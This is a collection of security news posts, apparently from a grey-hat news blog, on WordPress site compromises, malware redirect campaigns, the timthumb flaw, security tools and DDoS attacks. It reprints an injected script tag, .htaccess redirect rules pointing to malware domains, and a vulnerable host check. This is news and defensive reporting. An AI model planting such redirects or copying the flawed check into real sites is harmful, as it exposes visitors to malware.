Master Card Blog Hacked & defaced By Syrian Electronic Army

Master Card Payments Perspectives Blog Hacked & defaced By Syrian Electronic Army

It's became a very common scenario that hackers targets banks, payment gateway and other financial sectors. Sites like Paypal, Visa, Master Card were among those common victims who used to face massive round of cyber attacks. Past two years hacktivist managed to interrupt the service of those websites many times. Here also in the beginning of 2013 almost same situation took place, when the official blog of Master Card get hacked and defaced.  It was the Saturday evening when a hackers collective group named "Syrian Electronic Army" managed to breach and get access inside Master Card blog. I am sure that all our readers will be shocked after hearing the way of intrusion. In the platform of the blog, Master Card was using an older version of WordPress (Ver. 3.3.2) which has several critical vulnerabilities like XSS, file uploading, CSRF and so on. Exploiting those loopholes the hacker managed to get access inside the blog and defaced one of the page of the giant in international financial services company's blog. Though WordPress have released a security patch and also version 3.5, but it's quite unfortunate and shocking that Master Card did not even patched their older version for which their system get penetrated. It is truly unbelievable that sites like Master Card is so careless about basic security and counter measure of cyber attack. According to sources Syrian Electronic Army used  the CSRF exploit of WordPress which is said to be available on the Internet and allows an attacker to add a new administration user. This is a possible explanation of how the Syrian Electronic Army managed to hack and deface the blog. After this incident occurs Master Card immediately updated the version of WP and closed those back doors. Still the the defaced and cached version of the  blog can be viewed on Google’s Web Cache. 

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
<a href=">Master Card Blog Hacked & defaced By Syrian Electronic Army"https://www.voiceofgreyhat.com/2013/01/MasterCard-Blog-Hacked-By-Syrian-Electronic-Army.html</a>

Reuters Hacked Again With Hoax of Saudi Arabia's Foreign Minister Saud al-Faisal Death

Reuters Hacked Again With Hoax of Saudi Arabia's Foreign Minister Saud al-Faisal Death 

Yet again Reuters have fallen victim to cyber criminals. A week ago blogging platform of Reuters was compromised and a false interview with a Syrian rebel leader was posted by the hacker on a Reuters' journalist's blog. This time also the same story repeats, this the second time in a single month, which immediately rises questions about Reuters' security concern. A report appeared on the Reuters blog, stating that Saudi Arabia's foreign minister Saud al-Faisal had passed away. The information was phony and the handiwork of hackers who had happily chipped away at Reuters' security system. The false report was immediately deleted. The entire blogs.reuters.com platform remained temporarily down again till Thursday (Aug. 16), later it was restored and came back to its general format. 

Reuters confirmed the attack while saying- "Reuters.com was a target of a hack on Tuesday. Our blogging platform was compromised and a fabricated blog post saying Saudi Arabia's Foreign Minister Prince Saud al-Faisal had died was illegally posted on a Reuters journalist's blog on Reuters.com"

According to experts Reuters had been running the WordPress 3.1.1 version software, instead of the latest 3.4.1 version. It has been indicated that the older version of WordPress has a minimum of 20 reported vulnerabilities."Wordpress and its plug-ins are often targeted by attackers as the wide proliferation of the software makes it a target that provides a lot of bang for the buck for exploit developers," said Marcus Carey of Rapid7. "the blame lies with site owners and administrators who fail to keep up with patches. While updating software is a basic step, there is evidence of a lack of execution in this area." -Carey added

-Source (BBC)

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
<a href=">Reuters Hacked Again With Hoax of Saudi Arabia's Foreign Minister Saud al-Faisal Death"https://www.voiceofgreyhat.com/2012/08/Reuters-Hacked-Again.html</a>

Microsoft Azure Cloud Starts Supporting Linux (Hybrid Cloud)

Microsoft Azure Cloud Starts Supporting Linux (Hybrid Cloud)

If you love both Microsoft and Linux parallely then we have a great news for you and that is Microsoft is now offering Linux-based operating systems on its Windows Azure cloud service. The software giant has announced the release of a new preview version of the platform which will add Infrastructure-as-a-Service (IaaS) capabilities to it. As well as Windows Server 2008 and the release candidate of Windows Server 2012, Microsoft will be supporting openSUSE 12.1, SUSE Linux Enterprise Server 11, Ubuntu 12.04 and CentOS 6.2 on the Hyper-V virtual machines that power Azure.

Some of the Highlights:- 

• Windows Azure Virtual Machines— Virtual Machines give you application mobility, allowing you to move your virtual hard disks (VHDs) back and forth between on-premises and the cloud.   Migrate existing workloads such as Microsoft SQL Server or Microsoft SharePoint to the cloud, bring your own customized Windows Server or Linux images, or select from a gallery.    As a common virtualization file format, VHD has been adopted by hundreds of vendors and is a freely available specification covered under the Microsoft Open Specification Promise.
• Windows Azure Virtual Network— Virtual Network lets you provision and manage virtual private networks (VPNs) in Windows Azure as well as securely extend on-premises networks into the cloud.  It provides control over network topology, including configuration of IP addresses, routing tables and security policies and uses the industry-standard IPSEC protocol to provide a secure connection between your corporate VPN gateway and Windows Azure. 
• Windows Azure Web Sites —Build web sites and applications with this highly elastic solution supporting .NET, Node.js, and PHP while using common deployment techniques like Git and FTP.  Windows Azure Web Sites will also allow easy deployment of open source applications like WordPress, Joomla!, DotNetNuke, Umbraco, and Drupal to the cloud with a few clicks. 
• New tools, language support, and SDK—Windows Azure SDK June 2012 includes new developer capabilities for writing code against the latest service improvements with updated support for Java, PHP, and .NET, and the addition of Python as a supported language on Windows Azure.  Additionally, the SDK now provides 100% command line support for both Windows and Mac.
• Availability in New Countries— Availability of Windows Azure is being expanded to customers in 48 new countries, including Russia, South Korea, Taiwan, Turkey, Egypt, South Africa, and Ukraine.  Roll-out will be complete later this month, making Windows Azure one of the most widely available cloud platforms in the industry with offerings in 89 countries and in 19 local currencies.  

These new capabilities simplify building and bringing applications of all kinds to the cloud and enable flexibility in the following areas:

• Increased datacenter capacity through secure VPN connections to the cloud
• Easy operations and management from an improved Windows Azure Management Portal, with powerful operational capabilities for deploying and managing your cloud applications – with similar management support from the command line
• Cloud scale for building websites with ASP.NET, PHP, and Node.js
• Support for additional Operating Systems and OSS language libraries for building cloud applications
• Scale on demand by migrating existing applications to the cloud using portable, industry standard VHDs -- delivering global scale with maximum control
• Secure connectivity between cloud and on-premises applications
• Ability to develop, test and configure new applications in the cloud, and then deploy on-premises for production

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
<a href=">Microsoft Azure Cloud Starts Supporting Linux (Hybrid Cloud)"https://www.voiceofgreyhat.com/2012/06/microsoft-azure-cloud-starts-supporting.html</a>

Flashback Botnet Originated From Hacked & Malware-rigged WordPress Sites -Said Researchers

Flashback Botnet Originated From Hacked & Malware-rigged WordPress Sites -Said Researchers

Massive Flashback botnet that hit more than 60K Mac PC world wide originated from hacked and malware-rigged WordPress blog sites. Researchers figure out there were between 30,000 and 100,000 WordPress sites infected in late February and early March, 85% of which are in the United States.

Kaspersky Lab researchers say the infected WordPress blog sites were rigged with code that silently redirected visitors to a malicious server. "When the connection was made to the malicious server, that server would determine which OS was running and serve exploits accordingly," says Roel Schouwenberg, senior researcher for Kaspersky. It was a pay-per-install scheme to spread malware, including the Flashback Trojan.

Most researchers say a gradual decline in machines infected by the Trojan is still underway: As of Thursday, there were about 140,000 infected Macs still out there, according to Symantec, and Kaspersky says it sees only about 30,629 Flashback-infected bots in its sinkhole. Still on the horizon, too, is the possibility of a Flashback comeback, with the command-and-control servers sending their bots updates. "We are watching the command-and-control domains used to control this botnet for any updates ... We haven't seen any new updates being delivered," said Liam O Murchu, manager of operations for Symantec Security Response. "Flashback generates new domains every day, which shows us the attackers have probably written malicious code before. They are aware that their botnet could be taken down with a single domain, so they generate a new one every day." To see the full story click here. 

Earlier also Mac users faced such attacks when mac Trojan OSX.SabPub was spreading through Java exploits In 2011 we have also seen OSX/Revir-B trojan was installed behind a PDF, and giving hackers remote access to MAC computers, not only Revier-B also Linux Tsunami trojan Called "Kaiten" targeted Mac OS users in 2011. Also another malware named "Devil Robber" which was also make MAC users victim while stealing their personal informations.

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
<a href=">Flashback Botnet Originated From Hacked & Malware-rigged WordPress Sites -Said Researchers"https://www.voiceofgreyhat.com/2012/04/flashback-botnet-originated-from-hacked.html</a>

Popular Gaming Site of France Infecting Visitors With ZeuS

Popular Gaming Site of France Infecting Visitors With ZeuS 

Researcher from Anti-virus company and security firm Avast, has find out that a French website of popular game Assassin’s Creed has been serving ZeuS malware variants to its visitors for over 8 weeks. The site has been infected with a Trojan java script redirector that sends visitors to a Russian malware site and connects them to a ZeuS powered botnet. The infection was last confirmed by the AVAST Virus Lab at 12.00 CET, April 10, 2012. And, just to make it clear, this Assassinscreedfrance.fr site is not affiliated with Ubisoft, the developers of the Assassin’s Creed franchise. 

The web site is currently returning a “Parse error: syntax error, unexpected T_CONSTANT_ENCAPSED_STRING in /homepages/23/d207590046/htdocs/wp-content/plugins/countdown-timer/fergcorp_countdownTimer.php on line 1050” error message. 

According to Avast official blog post - So far, Avast has blocked over 179,800 visits by its users to this site. And, Assassinscreedfrance.fr is just one of 1,841 sites around the globe that has been infected with this specific Trojan during the month of March. The infection, a Trojan redirector, sends users to Russian malware distribution server with an IP registered in Saint Petersburg, Russia. And yes, this sever is still working, even after Microsofts’ recent takedown of a few dozen botnet servers. The infection at Assassinscreedfrance.fr is located in the countdown timer in the JavaScript module, a common WordPress plugin. Other sites had infections hitting a wide range of WordPress vulnerabilities. “The bad guys are using an automatic tool that is looking for some holes,” said Jan Sirmer, analyst from the AVAST Virus Lab. “Assassinscreedfrance.fr may have become vulnerable by using an outdated version of WordPress, even though their JavaScript plugin is up-to-date. For the rest of these sites, we can safely say that older programs and plugins are common ways to get infected.” 

-Source (Avast Blog)

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
<a href=">Popular Gaming Site of France Infecting Visitors With ZeuS"https://www.voiceofgreyhat.com/2012/04/popular-gaming-site-of-france-infecting.html</a>

WordPress 3.4 Beta 1 Released For Testing !!

WordPress 3.4 Beta 1 Released For Testing 

Earlier we have talked several times about WordPress. Last week the developers at WordPress has officially announced the arrival of the first beta of version 3.4 of WordPress. Aimed at testers, the development release includes improvements to theme search and selection, as well as a new theme customizer with previewer. In the release note Jane Wells said- "As always, this is software still in development and we don’t recommend that you run it on a production site — set up a test site just to play with the new version. If you break it (find a bug), please report it, and if you’re a developer, try to help us fix it. If all goes well, we hope to release WordPress 3.4 in May. The more help we get with testing and fixing bugs, the sooner we will be able to release the final version."

What’s New:-

• Theme Customizer with Previewer

• Flexible Custom Header Sizes

• Selecting Custom Header and Background Images from Media Library

• Better experience searching for and choosing a theme

Change Log:-

• New XML-RPC API for external and mobile applications

• New API for registering theme support for custom headers and backgrounds

• Performance improvements to WP_Query by splitting the query (Please test!)

• Internationalization improvements (improved performance and locale support)

• Performance and API improvements when working with lists of installed themes

• Support for installing child themes from the WordPress Themes Directory

To Download WordPress 3.4 Beta 1 Click Here

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
<a href=">WordPress 3.4 Beta 1 Released For Testing !!"https://www.voiceofgreyhat.com/2012/04/wordpress-34-beta-1-released-for.html</a>

Fake Antivirus Exploit: More Than 200,000 Websites Have Been Infected

Fake Antivirus Exploit: More Than 200,000 Websites Have Been Infected 

More than 200,000 websites with fake anti-virus software, almost 30,000 unique sites has already been compromised with this fake anti-virus exploit. According to computer security group Websense, the exploit, which mostly affects sites built with WordPress, places a short piece of injected code at the bottom of a page:-

</DIV><!--END body=wrapper ==>
<script src="http://ionis901andsi.rr.nu/mm.php?d=1"></script>
</BODY></HTML>

When a user loads the page, they're redirected to a page in the .rr.nu top-level domain that mimics a Windows security scan, then asks them to download a malicious program to supposedly clear viruses from their computer. It's a scam that's been running in various forms for years, and Websense says it's been tracking this particular threat for several months.
Although the source of the malware is unknown, over 85% of the affected sites are from the United States, and Sucuri Security has traced many of the cases to old WordPress installs, weak passwords, or vulnerable and malicious plugins. According to several reports the exploit isn't as widespread as something like DNSChanger. However, for anyone who runs WordPress software, it's something to watch out for.

Earlier in 2011 we have also seen such scenario when 614,000 webpages comromised with mass ASP.NET Infection, also Willysy malware Infects More than 6 Million WeSites, Lilupophilupop Attack took 1 Million+ Web-pages and so on.

-Source (The Verge)

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
<a href=">Fake Antivirus Exploit: More Than 200,000 Websites Have Been Infected"https://www.voiceofgreyhat.com/2012/03/fake-antivirus-exploit-more-than-200000.html</a>

WordPress Security Vulnerability Scanner v.1.1

WPScan is a WordPress Security vulnerability scanner which checks the security of WordPress installations using a black box approach. WPScan is a black box WordPress Security Scanner written in Ruby which attempts to find known security weaknesses within WordPress installations. Its intended use it to be for security professionals or WordPress administrators to asses the security posture of their WordPress installations. The code base is Open Source and licensed under the GPLv3.

Official Changelog For WPScan v.1.1 :-

•     Detection for 750 more plugins.
•     Detection for 107 new plugin vulnerabilities.
•     Detection for 447 possible timthumb file locations.
•     Advanced version fingerprinting implemented.
•     Full Path Disclosure (FPD) checks.
•     Auto updates.
•     Progress indicators.
•     Improved custom 404 checking.
•     Improved plugin detection.
•     Improved error_log checking.
•     Lots of bugs fixed. Lots of small tweaks.

To Download WPScan Click Here

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
<a href=">WordPress Security Vulnerability Scanner v.1.1"https://www.voiceofgreyhat.com/2011/11/wordpress-security-vulnerability.html</a>

Top 5 DDoS Attacks of 2011, Exclusive Report By Corero Network Security

Corero Network Security (cns:LN), the leader in on-premises Distributed Denial of Service (DDoS) Defense Systems for enterprises, data centers and hosting providers, named its list of 2011's Top 5 DDoS attacks. Corero's findings show an increase in newer, intelligent application-layer DDoS attacks that are extremely difficult to identify "in the cloud," and often go undetected until it is too late. Corero also found an uptick in attacks against corporations by "hactivists" DDoS-ing sites for political and ideological motives, rather than financial gain. Attacks against Mastercard, Visa, Sony, PayPal and the CIA top Corero's list.
"The cat-and-mouse game between IT administrators, criminals and hactivists has intensified in 2011 as the number of application-layer DDoS attacks has exploded. Coupled with an increase in political and ideological hactivism, companies have to be extremely diligent in identifying and combating attempts to disable their websites, steal proprietary information and to deface their web applications, " said Mike Paquette, chief strategy officer, Corero Network Security.

Corero's 2011 Top 5 DDoS Attacks:-

1. Anonymous DDoS Attacks on WikiLeaks "Censors" Visa, MasterCard and PayPal. The most significant DDoS attack so far this year, the WikiLeaks-related DDoS attacks on Visa, MasterCard and PayPal were both Anonymous' "coming out" party, and the first widespread example of what has been dubbed "cyber rioting" on the Internet, with virtual passersby joining in the attack voluntarily.

2. Sony PlayStation Network DDoS. A shocking wake-up call for many gamers, customers and investors, the Sony Playstation Network DDoS attack began a series of cyber attacks and data breaches that damaged Sony financially and hurt its reputation.

3. CIA and SOCA Hit by LulzSec DDoS Attacks. The appearance of LulzSec on the cyber attack scene, highlighted by bold DDoS attacks on the CIA and the U.K. Serious Organised Crime Agency (SOCA), made us wonder if anyone was safe on the Internet.

4. WordPress DDoS. A massive DDoS attack disrupted one of the world's largest blog hosts--some 18 million websites. The huge attack hit the company's data centers with tens of millions of packets per second.

5. Hong Kong Stock Exchange. This DDoS attack had a major impact on the financial world, disrupting stock market trading in Hong Kong. This was a highly leveraged DDoS attack, potentially affecting hundreds of companies and individuals through a single target.

For all the pain and suffering DDoS attacks have caused, there are a number of best practices that companies can implement to reduce their risk. The most effective defense against DDoS attacks requires expert preparation of defensive resources, ongoing vigilance and a rapid, organized response.

-News Source (Corero Network Security)

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
<a href=">Top 5 DDoS Attacks of 2011, Exclusive Report By Corero Network Security"https://www.voiceofgreyhat.com/2011/10/top-5-ddos-attacks-of-2011-exclusive.html</a>

The Reason Behind The Massive Cyber-attack On godaddy.com Was A Malware

Hundreds of Go Daddy sites were compromised to point towards a site hosting malware last weekend. The mass hack of around 445 sites involved the injection of hostile code into the .htaccess files of the sites. 

Code:-

RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .*ask.com.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*bing.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*live.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*excite.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*search.yahoo*$ [NC]
RewriteRule .* http://sokoloperkovuskeci.com/in.php?g=916 [R,L] 

Go Daddy quickly removed the hostile code before working with its customers to take back full control of the sites, which were reportedly compromised by a password hack.
Go Daddy’s chief information security officer, Todd Redfoot, told Domain Name Wire: "The accounts were accessed using the account holder’s username and password.”
It's unclear how the passwords needed to pull off the attack were obtained, but some sort of targeted phishing attack is one likely explanation. Go Daddy's investigation into the attack continues but Redfoot suggested the blame for the mass hack was outside Go Daddy's control.
"This was not an infrastructure breakdown and should not impact additional customers," he said.
Web security monitoring firm Securi warned of the mass hack on Thursday. Its blog post about the attack suggests the malicious code was targeted towards surfers visiting the affected domains via Google or other search engines rather than those who had arrived directly. Such trickery is often part and parcel of search engine manipulation attacks designed to redirect surfers hunting for content related to items in the news towards scareware portals. This kind of trickery often takes advantage of insecure WordPress installations and the like, so the apparent use of password-snaffling trickery in this case suggests the bad guys are becoming more aggressive in their hunt for sites they can abuse for their own malicious ends.

-News Source (Register)

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
<a href=">The Reason Behind The Massive Cyber-attack On godaddy.com Was A Malware"https://www.voiceofgreyhat.com/2011/09/reason-behind-massive-cyber-attack-on.html</a>

Image-Based Zero-day Vulnerability in WordPress

Bilocating technology blogger Mark Maunder - he claims to live in Seattle and Cape Town concurrently, though I suspect he means consecutively, and I'll wager he wisely avoids winter in both of them - recently wrote about an intrusion to his WordPress site.

It turns out the backdoor was a previously-unexploited, or at least a previously-undocumented, flaw in a useful little WordPress addon, shared by many WordPress themes, called timthumb.

Timthumb is an 864-line PHP script which assists with automatic image resizing, thumbmailing and so forth. (It doesn't squeeze the image manipulation code into those 864 lines, but uses the third-party GD library.)

If you run WordPress and you have a file named timthumb.php, sometimes renamed to thumb.php, in your installation, you may be at risk.

Tracking down the mechanism behind his intrusion, Maunder identified three main problems with timthumb.php: poor default settings; poor verification of input data; and poor choice of file permissions for temporary files.

By default, the vulnerable version of timthumb allowed images from external sites to be accessed from your server. The default list is probably unsurprising: 

// external domains that are allowed to be displayed on your website

$allowedSites = array (

'flickr.com',

'picasa.com',

'img.youtube.com',

'upload.wikimedia.org',

);

But a better default would be an empty list, so that users who want to allow external files to be sourced by their own servers need to take steps to enable that capability.

If you use WordPress and timthumb and you don't need this capability, Maunder suggests simply editing the timthumb.php code to say $allowedSites = array(); in order to prevent remote file trickery.

Secondly, timthumb.php checked the sanity of remote URLs - to verify they really were in the list of allowed sites - by looking for the permitted domains somewherewere the hostname part:

in the hostname part of the URL, rather than making sure they

$isAllowedSite = false;

foreach ($allowedSites as $site) {

if (strpos (strtolower ($url_info['host']), $site) !== false) {

$isAllowedSite = true;

}

}

This code meant that a dodgy website name such as picasa.com.badsite.example would pass the test, simply because it contains the string picasa.com. Clearly, that is not what was intended.

Lastly, timthumb.php stored the files it generated in a cache directory which is inside the PHP directory tree. This is bad, because files generated from untrusted external content - files only ever intended to be displayed - needlessly became executable.

So if the cached file isn't an innocent image, but a remote access PHP Trojan (in Maunder's case, the attacker used a malicious remote console tool called Alucar), you're owned

If you are a web developer:

* Don't trust externally-sourced content by default. Force your users to think about what they really want.

* Check, test, check, test, check and test again your URL sanitisation code. Build a decent test suite and verify your code against it every time you release an update.

* Keep files which are only ever supposed to be used as data - especially remotely-sourced files - outside the directory tree where your server-side executable code lives.

If you run a WordPress installation:-

Check if any of the blogs you host use timthumb.php, and upgrade to the latest version. The dodgy strpos above has been replaced with a tighter match based on a regular expression, like this:

$isAllowedSite = false;

foreach ($allowedSites as $site) {

if (preg_match ('/(?:^|\.)' . $site . '$/i', $url_info['host'])) {

$isAllowedSite = true;

}

}

This doesn't fix all of the issues Maunder describes, but it's better than having a known hole in your site.

Many thanks to Mr Maunder for turning an attack on his site into a training tool to help the rest of us avoid a similar problem!

-News Source (NS)

SHARE OUR NEWS DIRECTLY ON SOCIAL NETWORKS:-
<a href=">Image-Based Zero-day Vulnerability in WordPress"https://www.voiceofgreyhat.com/2011/08/image-based-zero-day-vulnerability-in.html</a>

Nmap 5.59 BETA1 (With 40 new NSE scripts)

Nmap 5.59 BETA1 released. This version includes 40 new NSE scripts (plus improvements to many others), even more IPv6 goodness than the informal World IPv6 Day release, 7 new NSE protocol libraries and hundreds of bug fixes! This release also expands and improves IPv6 support!

o [NSE] Added 40 scripts, bringing the total to 217!  You can learn
 more about any of them at http://nmap.org/nsedoc/. Here are the new
 ones (authors listed in brackets):

 + afp-ls: Lists files and their attributes from Apple Filing
   Protocol (AFP) volumes. [Patrik Karlsson]

 + backorifice-brute: Performs brute force password auditing against
   the BackOrifice remote administration (trojan) service. [Gorjan
   Petrovski]

 + backorifice-info: Connects to a BackOrifice service and gathers
   information about the host and the BackOrifice service
   itself. [Gorjan Petrovski]

 + broadcast-avahi-dos: Attempts to discover hosts in the local
   network using the DNS Service Discovery protocol, then tests
   whether each host is vulnerable to the Avahi NULL UDP packet
   denial of service bug (CVE-2011-1002). [Djalal Harouni]

 + broadcast-netbios-master-browser: Attempts to discover master
   browsers and the Windows domains they manage. [Patrik Karlsson]

 + broadcast-novell-locate: Attempts to use the Service Location
   Protocol to discover Novell NetWare Core Protocol (NCP)
   servers. [Patrik Karlsson]

 + creds-summary: Lists all discovered credentials (e.g. from brute
   force and default password checking scripts) at end of scan.
   [Patrik Karlsson]

 + dns-brute: Attempts to enumerate DNS hostnames by brute force
   guessing of common subdomains. [Cirrus]

 + dns-nsec-enum: Attempts to discover target hosts' services using
   the DNS Service Discovery protocol. [Patrik Karlsson]

 + dpap-brute: Performs brute force password auditing against an
   iPhoto Library. [Patrik Karlsson]

 + epmd-info: Connects to Erlang Port Mapper Daemon (epmd) and
   retrieves a list of nodes with their respective port
   numbers. [Toni Ruottu]

 + http-affiliate-id: Grabs affiliate network IDs (e.g. Google
   AdSense or Analytics, Amazon Associates, etc.) from a web
   page. These can be used to identify pages with the same
   owner. [Hani Benhabiles, Daniel Miller]

 + http-barracuda-dir-traversal: Attempts to retrieve the
   configuration settings from a Barracuda Networks Spam & Virus
   Firewall device using the directory traversal vulnerability
   described at
   http://seclists.org/fulldisclosure/2010/Oct/119. [Brendan Coles]

 + http-cakephp-version: Obtains the CakePHP version of a web
   application built with the CakePHP framework by fingerprinting
   default files shipped with the CakePHP framework. [Paulino
   Calderon]

 + http-majordomo2-dir-traversal: Exploits a directory traversal
   vulnerability existing in the Majordomo2 mailing list manager to
   retrieve remote files. (CVE-2011-0049). [Paulino Calderon]

 + http-wp-plugins: Tries to obtain a list of installed WordPress
   plugins by brute force testing for known plugins. [Ange Gutek]

 + ip-geolocation-geobytes: Tries to identify the physical location
   of an IP address using the Geobytes geolocation web service
   (http://www.geobytes.com/iplocator.htm). [Gorjan Petrovski]

 + ip-geolocation-geoplugin: Tries to identify the physical location
   of an IP address using the Geoplugin geolocation web service
   (http://www.geoplugin.com/). [Gorjan Petrovski]

 + ip-geolocation-ipinfodb: Tries to identify the physical location
   of an IP address using the IPInfoDB geolocation web service
   (http://ipinfodb.com/ip_location_api.php). [Gorjan Petrovski]

 + ip-geolocation-maxmind: Tries to identify the physical location of
   an IP address using a Geolocation Maxmind database file (available
   from http://www.maxmind.com/app/ip-location). [Gorjan Petrovski]

 + ldap-novell-getpass: Attempts to retrieve the Novell Universal
   Password for a user. You must already have (and include in script
   arguments) the username and password for an eDirectory server
   administrative account. [Patrik Karlsson]

 + mac-geolocation: Looks up geolocation information for BSSID (MAC)
   addresses of WiFi access points in the Google geolocation
   database. [Gorjan Petrovski]

 + mysql-audit: Audit MySQL database server security configuration
   against parts of the CIS MySQL v1.0.2 benchmark (the engine can
   also be used for other MySQL audits by creating appropriate audit
   files).  [Patrik Karlsson]

 + ncp-enum-users: Retrieves a list of all eDirectory users from the
   Novell NetWare Core Protocol (NCP) service. [Patrik Karlsson]

 + ncp-serverinfo: Retrieves eDirectory server information (OS
   version, server name, mounts, etc.) from the Novell NetWare Core
   Protocol (NCP) service. [Patrik Karlsson]

 + nping-brute: Performs brute force password auditing against an
   Nping Echo service. [Toni Ruottu]

 + omp2-brute: Performs brute force password auditing against the
   OpenVAS manager using OMPv2. [Henri Doreau]

 + omp2-enum-targets: Attempts to retrieve the list of target systems
   and networks from an OpenVAS Manager server. [Henri Doreau]

 + ovs-agent-version: Detects the version of an Oracle OVSAgentServer
   by fingerprinting responses to an HTTP GET request and an XML-RPC
   method call. [David Fifield]

 + quake3-master-getservers: Queries Quake3-style master servers for
   game servers (many games other than Quake 3 use this same
   protocol). [Toni Ruottu]

 + servicetags: Attempts to extract system information (OS, hardware,
   etc.) from the Sun Service Tags service agent (UDP port
   6481). [Matthew Flanagan]

 + sip-brute: Performs brute force password auditing against Session
   Initiation Protocol (SIP -

http://en.wikipedia.org/wiki/Session_Initiation_Protocol)

   accounts.  This protocol is most commonly associated with VoIP
   sessions. [Patrik Karlsson]

 + sip-enum-users: Attempts to enumerate valid SIP user accounts.
   Currently only the SIP server Asterisk is supported. [Patrik
   Karlsson]

 + smb-mbenum: Queries information managed by the Windows Master
   Browser. [Patrik Karlsson]

 + smtp-vuln-cve2010-4344: Checks for and/or exploits a heap overflow
   within versions of Exim prior to version 4.69 (CVE-2010-4344) and
   a privilege escalation vulnerability in Exim 4.72 and prior
   (CVE-2010-4345). [Djalal Harouni]

 + smtp-vuln-cve2011-1720: Checks for a memory corruption in the
   Postfix SMTP server when it uses Cyrus SASL library authentication
   mechanisms (CVE-2011-1720).  This vulnerability can allow denial
   of service and possibly remote code execution. [Djalal Harouni]

 + snmp-ios-config: Attempts to downloads Cisco router IOS
   configuration files using SNMP RW (v1) and display or save
   them. [Vikas Singhal, Patrik Karlsson]

 + ssl-known-key: Checks whether the SSL certificate used by a host
   has a fingerprint that matches an included database of problematic
   keys. [Mak Kolybabi]

 + targets-sniffer: Sniffs the local network for a configurable
   amount of time (10 seconds by default) and prints discovered
   addresses. If the newtargets script argument is set, discovered
   addresses are added to the scan queue. [Nick Nikolaou]

 + xmpp: Connects to an XMPP server (port 5222) and collects server
   information such as supported auth mechanisms, compression methods
   and whether TLS is supported and mandatory. [Vasiliy Kulikov]

o Nmap has long supported IPv6 for basic (connect) port scans, basic
 host discovery, version detection, Nmap Scripting Engine.  This
 release dramatically expands and improves IPv6 support:
 + IPv6 raw packet scans (including SYN scan, UDP scan, ACK scan,
   etc.) are now supported. [David, Weilin]
 + IPv6 raw packet host discovery (IPv6 echo requests, TCP/UDP
   discovery packets, etc.) is now supported. [David, Weilin]
 + IPv6 traceroute is now supported [David]
 + IPv6 protocol scan (-sO) is now supported, including creating
   realistic headers for many protocols. [David]
 + IPv6 support to the wsdd, dnssd and upnp NSE libraries. [Daniel
   Miller, Patrik]
 + The --exclude and --excludefile now support IPV6 addresses with
   netmasks.  [Colin]

o Scanme.Nmap.Org (the system anyone is allowed to scan for testing
 purposes) is now dual-stacked (has an IPv6 address as well as IPv4)
 so you can scan it during IPv6 testing.  We also added a DNS record
 for ScanmeV6.nmap.org which is IPv6-only. See
 http://seclists.org/nmap-dev/2011/q2/428. [Fyodor]

o The Nmap.Org website as well as sister sites Insecure.Org,
 SecLists.Org, and SecTools.Org all have working IPv6 addresses now
 (dual stacked). [Fyodor]

o Nmap now determines the filesystem location it is being run from and
 that path is now included early in the search path for data files
 (such as nmap-services).  This reduces the likelihood of needing to
 specify --datadir or getting data files from a different version of
 Nmap installed on the system.  For full details, see
 http://nmap.org/book/data-files-replacing-data-files.html.  Thanks
 to Solar Designer for implementation advice. [David]

o Created a page on our SecWiki for collecting Nmap script ideas! If
 you have a good idea, post it to the incoming section of the page.
 Or if you're in a script writing mood but don't know what to write,
 come here for inspiration: https://secwiki.org/w/Nmap_Script_Ideas.

o The development pace has greatly increased because Google (again)
 sponsored a 7 full-time college and graduate student programmer
 interns this summer as part of their Summer of Code program!
 Thanks, Google Open Source Department!  We're delighted to introduce
 the team: http://seclists.org/nmap-dev/2011/q2/312

o [NSE] Added 7 new protocol libraries, bringing the total to 66.  You
 can read about them all at http://nmap.org/nsedoc/. Here are the new
 ones (authors listed in brackets):

 + creds: Handles storage and retrieval of discovered credentials
   (such as passwords discovered by brute force scripts). [Patrik
   Karlsson]

 + ncp: A tiny implementation of Novell Netware Core Protocol
   (NCP). [Patrik Karlsson]

 + omp2: OpenVAS Management Protocol (OMP) version 2 support. [Henri
   Doreau]

 + sip: Supports a limited subset of SIP commands and
   methods. [Patrik Karlsson]

 + smtp: Simple Mail Transfer Protocol (SMTP) operations. [Djalal
   Harouni]

 + srvloc: A relatively small implementation of the Service Location
   Protocol. [Patrik Karlsson]

 + tftp: Implements a minimal TFTP server. It is used in
   snmp-ios-config to obtain router config files.[Patrik Karlsson]

o Improved Nmap's service/version detection database by adding:
 + Apple iPhoto (DPAP) protocol probe [Patrik]
 + Zend Java Bridge probe [Michael Schierl]
 + BackOrifice probe [Gorjan Petrovski]
 + GKrellM probe [Toni Ruotto]
 + Signature improvements for a wide variety of services (we now have
   7,375 signatures)

o [NSE] ssh-hostkey now additionally has a postrule that prints hosts
 found during the scan which share the same hostkey. [Henri Doreau]

o [NSE] Added 300+ new signatures to http-enum which look for admin
 directories, JBoss, Tomcat, TikiWiki, Majordomo2, MS SQL, WordPress,
 and more. [Paulino]

o Made the final IP address space assignment update as all available
 IPv4 address blocks have now been allocated to the regional
 registries.  Our random IP generation (-iR) logic now only excludes
 the various reserved blocks.  Thanks to Kris for years of regular
 updates to this function!

o [NSE] Replaced http-trace with a new more effective version. [Paulino]

o Performed some output cleanup work to remove unimportant status
 lines so that it is easier to find the good stuff! [David]

o [Zenmap] now properly kills Nmap scan subprocess when you cancel a
 scan or quit Zenmap on Windows. [Shinnok]

o [NSE] Banned scripts from being in both the "default" and
 "intrusive" categories.  We did this by removing dhcp-discover and
